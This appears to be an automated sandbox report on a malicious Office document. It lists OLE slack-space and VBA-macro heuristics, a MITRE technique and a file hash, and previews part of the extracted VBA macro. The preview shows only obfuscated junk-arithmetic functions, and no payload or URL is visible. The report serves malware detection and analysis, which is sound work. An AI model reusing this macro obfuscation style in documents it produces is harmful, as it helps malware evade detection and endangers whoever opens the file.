MALICIOUS
62
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The presence of VBA macros and the OLE slack space anomaly indicate a malicious document. The obfuscated VBA code strongly suggests it is designed to download and execute a second-stage payload, though the specific URL or execution method is not directly discernible due to the obfuscation. The embedded URL is benign.
Heuristics 3
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 108,444 bytes but its declared streams total only 57,435 bytes — 51,009 bytes (47%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4940 bytes |
SHA-256: 07168c26c8e8e140d1240af4c9c8178f5a9104551f73d5023b368425191583c4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "KfVvvOMj" Private Function zRFtwLHaz() On Error Resume Next wtIzFM = 64115 + vSErW * cnOJva + 91536 / MwsYi - wAhHv / 57645 * 95603 * 62440 / dUrjvz ckYuu = zazTjF / cXDWM / 16403 * AjbwP + 34005 / NRPYw + (FwmKBL / zLPiKj - wPZoj - rOwIc / dElJhu - YzfktV) OLYQui = 36714 + wrYhJE * hjWvlw + 92015 / uvHlpE - zbhPdN / 12313 * 69472 * 3369 / OOzmY BJnoCa = 79074 + zrKSLl * GvsitJ + 94278 / Qwana - DQOtw / 74806 * 12157 * 64951 / sitcp YnKCZ = 4343 + mTSiUm * dpErwA + 89175 / TawUZX - wGVwmN / 4030 * 87694 * 78594 / ZmdKvc End Function Private Function oQsmjwawrbp() On Error Resume Next iAozL = cFVTGw / jJsLrU / 50914 * QsCGU + 89854 / OXvsor + (YcWDOv / oDdfnl - Uajzt - NHlqqi / qwYOIF - kQooFi) VTpFIw = CAprtv / oPjXkt / 44286 * aHpbZJ + 53963 / oKXAl + (iMCwtH / vCaAo - EUlCD - YthPj / RaoAh - uEqkW) GovMhq = FJhWkh / cDDFqS / 21808 * iisPf + 5322 / wRmpNi + (FjBifO / MKCJWE - vQzzT - GRUSKu / KPkuT - fwTEIn) oYbhIa = wOsush / qjMjM / 11110 * fPWhAi + 8059 / stOflT + (PJZIw / JVNND - aHbZS - mJJEz / rpKWz - MwzdQC) qAihWi = LChoYK / RifSi / 9195 * ajPqw + 62365 / nSFEGi + (fGLwS / PmiENV - ITLIHZ - QUOrY / JXjck - cMlYT) InVuJ = zPiiQ / wRwJD / 20921 * RRHrn + 41846 / AGVwqZ + (PFznP / fKcLfG - jvznaG - pmBviY / Tquhnq - hLzWn) End Function Private Function iUIDnztcLkzAH() On Error Resume Next rtzdfD = 68366 + SomMn * CVhpKG + 16871 / mFXrk - WKKXN / 15933 * 7689 * 40797 / DMkvE QwmqCB = 65811 + MUKiW * lZPbA + 76711 / bWljON - jXlLqM / 66094 * 51272 * 77102 / VEvIi nTAKAV = 98468 + RDWDl * ifWziY + 37209 / zzZaG - GdQuh / 98853 * 93745 * 38543 / qSLnH AlGlI = 28529 + LzBip * sFnSi + 87876 / iPwfm - GidZLE / 22959 * 45246 * 9493 / lzwHtz dONWz = 46933 + QKhkl * awaImi + 44877 / adknSB - hmOfo / 75178 * 3210 * 46165 / kjEHv End Function Private Function PiiEPbkAXsDITl() On Error Resume Next pjolwC = imYUw / chjOE / 55865 * mJaIzY + 39948 / zkToK + (HhtYfc / SPXXkN - lMRMFs - jJjlZ / pjBEfl - UzqpYA) tCkOL = jlSHj / UbYNn / 12362 * zmNSrw + 44157 / lWcnEt + (mGvWOJ / vjzwT - tadCS - Bjfkt / owzOq - fYjoS) zzWWb = auVEFj / TwQOD / 9 * OcAFpR + 5452 / zYCJrm + (ZwRXiH / jKVAjE - muQlXp - wRhJd / zzBvsh - YSwfRi) slqri = vfAhL / ZVwsHH / 43280 * GZMJj + 84973 / RvpFIL + (aUKoBP / lnPlVR - jjYhvQ - SZhLm / ijLcCh - vdhSGH) End Function Private Function dTmAsLVWqbUd(mcChsEmnHArif) On Error Resume Next TKKnWw = (59171 + QKzZin / USbDPZ + hitAQO / 39566 / QjFbUV) / 32698 + fNiMC + GQEZLO * 72834 KbhkP = (32176 + NubHv / dOYTBb + jodCCw / 11616 / oMofbK) / 2802 + JtTuD + nMniEp * 83629 Lmdbt = (40576 + QNXuNT / SGDww + kNizcd / 93603 / DGICvl) / 30032 + rpcKfO + fpswwG * 8778 wiwHj = (99108 + YpMGO / ShrkPN + mJWOw / 14500 / jzkwvS) / 72309 + DRaLpL + qBrQwa * 28806 End Function Private Function iaFwDGZsLNOEiR() On Error Resume Next YpMNO = (1686 + lYpPNw / QiczmS + GJncmL / 73443 / honzKL) / 3570 + qjXrnv + dTEvco * 81958 QURfY = (70134 + oKurAb / ohOmm + PbCLV / 18225 / iQJBq) / 54273 + jpuWW + HijtD * 76511 YzQTM = (23861 + qGAjWm / GhmLR + bzJIXt / 67720 / AaDZQ) / 45805 + SBdWRA + zJPoZ * 98077 SOfRq = (39540 + tklWzi / vHiFTH + FBDajT / 83472 / zRQRw) / 67269 + bDFKzL + SjaJQ * 35149 WEAcwZ = (78771 + vTdHq / zKGOan + JpAfNA / 99631 / iUkrHD) / 97315 + nYTdt + DosXTL * 9203 End Function Private Function lTjmvuXZitj() On Error Resume Next RoWwZ = (66523 + WIRtiB / aLVjvV + WiWNb / 91120 / ZllCH) / 45005 + WFzOU + SrvKP * 41530 jnCjN = (5741 + GzlwnM / WjqXid + GYSaA / 7125 / mMzFdB) / 80773 + jStUWP + LPhIV * 39061 RhAhNV = (65497 + PsZwFY / zrDWZ + wiWvZ / 6364 / utjCA) / 59897 + Wqijb + iFlnk * 94070 EpisTC = (16921 + GZpCA / LkQMj + biHkca / 56201 / ThDqL) / 93369 + mYUdMj + fuqju * 50689 rsqDm = (53177 + wdloS / zWLWv + HwIMUv / 40169 / qziKcw) / 77368 + ApzND + XNsvJj * 60723 End Function Private Function zVfoMjIYQjYFO() On Error Resume Next pwLwV = (54399 + AjHfrP / XAYXTO + ikwunA / 93228 / QNYCou) / 10658 + BHwcZr + UlpitI * 81499 jQ ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.